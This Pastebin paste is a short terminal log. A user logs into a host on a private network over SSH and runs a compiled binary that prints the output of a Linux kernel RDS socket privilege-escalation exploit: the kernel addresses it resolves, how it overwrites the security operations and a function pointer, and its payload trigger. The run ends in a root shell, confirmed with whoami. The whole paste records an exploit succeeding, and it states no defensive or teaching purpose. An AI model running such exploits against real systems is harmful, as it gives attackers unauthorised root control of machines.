Advertisement
Guest User

Untitled

a guest
Jun 26th, 2017
466
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.60 KB | None | 0 0
  1. gabriel@suporte:~$ ssh user@192.168.1.103
  2. user@192.168.1.103's password:
  3. [user@bkpmgm ~]$ /teste/teste
  4. [*] Linux kernel >= 2.6.30 RDS socket exploit
  5. [*] by Dan Rosenberg
  6. [*] Resolving kernel addresses...
  7. [+] Resolved security_ops to 0xc0b3bfc4
  8. [+] Resolved default_security_ops to 0xc09b4948
  9. [+] Resolved cap_ptrace_traceme to 0xc058a48c
  10. [+] Resolved commit_creds to 0xc046059f
  11. [+] Resolved prepare_kernel_cred to 0xc0460410
  12. [*] Overwriting security ops...
  13. [*] Overwriting function pointer...
  14. [*] Triggering payload...
  15. [*] Restoring function pointer...
  16. [*] Got root!
  17. sh-4.0# whoami
  18. root
  19. sh-4.0#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement